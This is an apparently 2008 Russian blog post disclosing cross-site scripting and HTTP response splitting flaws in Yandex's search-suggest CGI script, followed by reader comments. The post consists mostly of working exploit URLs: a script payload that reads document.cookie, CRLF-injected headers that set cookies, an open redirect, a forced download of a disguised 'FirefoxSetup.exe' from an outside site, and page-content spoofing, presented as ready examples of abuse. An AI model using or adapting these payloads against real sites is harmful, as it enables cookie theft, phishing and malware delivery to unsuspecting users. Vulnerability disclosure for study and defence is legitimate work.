В сервисе поисковых подсказок Яндекса обнаружены множественные уязвимости

image

Теги: Яндекс, уязвимость

В suggest.yandex.ru найдены множественные уязвимости.

* Тип уязвимости: Межсайтовое выполнение сценариев (Cross-site Scripting, XSS). Недостаточная фильтрация содержимого переменной.

Приложение: /suggest-ya.cgi

GET-переменные: part

Пример: http://suggest.yandex.ru/suggest-ya.cgi?ct=text/html&part=<script>alert(document.cookie)</script>


* Тип уязвимости: Расщепление HTTP-запроса (HTTP Response Splitting)

Приложение: /suggest-ya.cgi

GET-переменные: ct

Пример: ttp://suggest.yandex.ru/suggest-ya.cgi?ct=text/html%0d%0aSet-cookie:Fuzzing=fuzzing.ru%0d%0a%0d%0a&part=fuzzing.ru (устанавливает cookie от имени сервера)


Простые примеры применения, не говоря уже о сложных вариантах.


* Универсальный редиректор - http://suggest.yandex.ru/suggest-ya.cgi?ct=text/html%0d%0aLocation:%20http://fuzzing.ru/%0d%0a%0d%0a&part=fuzzing.ru


* Использование уязвимостей других приложений или распостранение вирусов (подмена content-type)


Можно предложить, к примеру, скачать с Яндекса великолепную программу Firefox с поиском Яндекса

http://suggest.yandex.ru/suggest-ya.cgi?ct=application/x-msdos-program%0d%0aLocation:%20http://fuzzing.ru/blog/files/FirefoxSetup.exe%0d%0a%0d%0a&part=fuzzing.ru

Или любое другое приложение или мультимедиа-файл. К примеру.

http://suggest.yandex.ru/suggest-ya.cgi?ct=audio/mp3%0d%0aLocation:%20http://fuzzing.ru/blog/files/somedata.mp3%0d%0a%0d%0a&part=fuzzing.ru


* Подмена содержимого страницы - http://suggest.yandex.ru/suggest-ya.cgi?ct=text/html;charset=utf-8%0d%0a%0d%0a%D0%91%D0%BB%D0%BE%D0%B3%20fuzzing.ru<script>//&part=fuzzing.ru


или введите имя

CAPTCHA
Страницы: 1  2  
1
16-10-2008 22:22:33
>великолепную программу Firefox беспалева >__<
0 |
16-10-2008 23:23:53
NoScript+AdBlock прибили всё. В чем, собсна, никто и не сомневался
0 |
1
17-10-2008 05:02:39
Кстати, Фирефокс не грузит некоторые сайты. И релиз 3.1 не помог. При заходе Експлорером, ни какого гемороя там не обнаружено (по крайней мере за последний год).
0 |
1
17-10-2008 06:54:27
очевидно из-за того что огнелис соблюдает w3c стандарты а осел на них ложит =)
0 |
1
17-10-2008 08:55:01
Какие сайты? Может, что-то типа http://base.consultant.ru/cons ? Так там нужны XMLHTTP, XMLDOM, которые есть только в експлорре. А вот лучше бы обошлись без них
0 |
1
17-10-2008 11:13:18
...ну если под каждый сайт просмотровик писать.....то и интернет нужно начинать опять с начала делать...
0 |
1
17-10-2008 12:06:01
...ну если под каждый сайт просмотровик писать.....то и интернет нужно начинать опять с начала делать... Вообще-то обычно, к сожалению, зачастую именно сайты пишут под браузеры. А вот если быдлокодеры будут продолжать предлагать для просмотра сайта скачать голимый IE, то действительно может оказаться проще сделать с нулю новую глобальную сеть...
0 |
1
19-10-2008 07:06:49
Быдлокодеры должны помнить, что некоторые "технологии" используемые "только в експлорере" могут отказаться работать в будущих версиях того же експлорера!
0 |
1
20-10-2008 10:45:25
+100 Только даже не в будущих версиях, а в той же самой после очередного обновления: Также выпущено исправление, которое деактивирует ActiveX компоненты от Microgaming, System Requirements Lab, PhotostockPro и Microsoft ActiveX компоненты, описанные в MS02-044, MS08-017, MS08-041 и MS08-052. Сегодня технология есть, а после обновления её нет.
0 |
1
17-10-2008 12:27:23
NoScript+AdBlock...NoScript для лохов это как заказывать тяжелый грузовик для перевозки чемодана
0 |
17-10-2008 07:14:59
Хммм... не хотелбы показаться полным ломаком но ктонить мог бы мне объяснить что произошли и расшифровать сокращения и аббревиатуры.
0 |
1
17-10-2008 08:28:12
Ни один из примеров ничего не дал. "500 Internal error" и всё. Уже пофиксили?
0 |
1
17-10-2008 10:29:39
Не пофиксили, внимательнее смотри адрессную строчку
0 |
1
17-10-2008 15:05:03
Нужно запроцентить спецсимволы?
0 |
1
17-10-2008 11:13:56
странно что дыру еще не закрыли
0 |
17-10-2008 12:31:11
Странно, что об уязвимости разработчикам не сообщили. А это прямое нарушение закона. Самое интересное - ссылки выложили. Интересно, кто обнаружил эту уязвимость?
0 |
1
17-10-2008 17:18:34
Нарушение какого закона?
0 |
Страницы: 1  2